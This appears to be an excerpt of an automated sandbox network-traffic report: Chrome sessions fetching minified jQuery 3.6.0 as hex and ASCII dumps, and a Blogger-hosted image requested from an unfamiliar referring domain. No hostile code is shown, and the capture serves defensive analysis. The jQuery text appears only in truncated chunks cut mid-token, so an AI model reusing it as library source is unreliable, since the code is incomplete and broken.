                                                    2024-11-25 18:44:33 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                    Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                    2024-11-25 18:44:33 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                    Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                    2024-11-25 18:44:33 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                    Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                    2024-11-25 18:44:33 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                    Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                    2024-11-25 18:44:33 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                    Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                    2024-11-25 18:44:33 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                    Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                    2024-11-25 18:44:33 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                    Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                    2024-11-25 18:44:33 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                    Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                    2024-11-25 18:44:33 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                    Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                    2024-11-25 18:44:33 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                    Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    40192.168.2.449797151.101.66.1374432200C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:44:35 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                    Host: code.jquery.com
                                                    Connection: keep-alive
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                    Accept: */*
                                                    Sec-Fetch-Site: none
                                                    Sec-Fetch-Mode: cors
                                                    Sec-Fetch-Dest: empty
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    2024-11-25 18:44:36 UTC611INHTTP/1.1 200 OK
                                                    Connection: close
                                                    Content-Length: 89501
                                                    Server: nginx
                                                    Content-Type: application/javascript; charset=utf-8
                                                    Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                    ETag: "28feccc0-15d9d"
                                                    Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                    Access-Control-Allow-Origin: *
                                                    Cross-Origin-Resource-Policy: cross-origin
                                                    Via: 1.1 varnish, 1.1 varnish
                                                    Accept-Ranges: bytes
                                                    Date: Mon, 25 Nov 2024 18:44:36 GMT
                                                    Age: 2542351
                                                    X-Served-By: cache-lga21931-LGA, cache-nyc-kteb1890069-NYC
                                                    X-Cache: HIT, HIT
                                                    X-Cache-Hits: 55, 1
                                                    X-Timer: S1732560277.544975,VS0,VE1
                                                    Vary: Accept-Encoding
                                                    2024-11-25 18:44:36 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                    Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                    2024-11-25 18:44:36 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                                                    Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
                                                    2024-11-25 18:44:36 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
                                                    Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
                                                    2024-11-25 18:44:37 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
                                                    Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
                                                    2024-11-25 18:44:37 UTC16384INData Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d
                                                    Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
                                                    2024-11-25 18:44:37 UTC7581INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52
                                                    Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["X-R


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    41192.168.2.449796172.217.19.2254432200C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:44:36 UTC916OUTGET /img/b/R29vZ2xl/AVvXsEgdrhY6zM7txEf61nPO67_Cl7rOyCGsyEb9GaIEqe3M-p-yN2nJeBUGCXkDygK7t8xYVcKwSgu4v0_u6EZF5srUh16p0vNl1K8hBeBV8dg-KcOpt7y8vrkamMOU2HxW0STp0JDEp21FWuCWxDXZX0EtxoLPSBWR6WwhXZglXIvWXbh24ojuyofD6htY8D4/s3396/userinter.png HTTP/1.1
                                                    Host: blogger.googleusercontent.com
                                                    Connection: keep-alive
                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                    sec-ch-ua-mobile: ?0
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                    sec-ch-ua-platform: "Windows"
                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                    X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                    Sec-Fetch-Site: cross-site
                                                    Sec-Fetch-Mode: no-cors
                                                    Sec-Fetch-Dest: image
                                                    Referer: https://nl.nsiciumbe.com/
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    2024-11-25 18:44:38 UTC470INHTTP/1.1 200 OK
                                                    Content-Type: image/png
                                                    Vary: Origin
                                                    Access-Control-Expose-Headers: Content-Length
                                                    ETag: "v367e"
                                                    Expires: Tue, 26 Nov 2024 18:44:37 GMT
                                                    Cache-Control: public, max-age=86400, no-transform
                                                    Content-Disposition: inline;filename="userinter.png"
                                                    X-Content-Type-Options: nosniff
                                                    Date: Mon, 25 Nov 2024 18:44:37 GMT
                                                    Server: fife
                                                    Content-Length: 87859
                                                    X-XSS-Protection: 0
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close
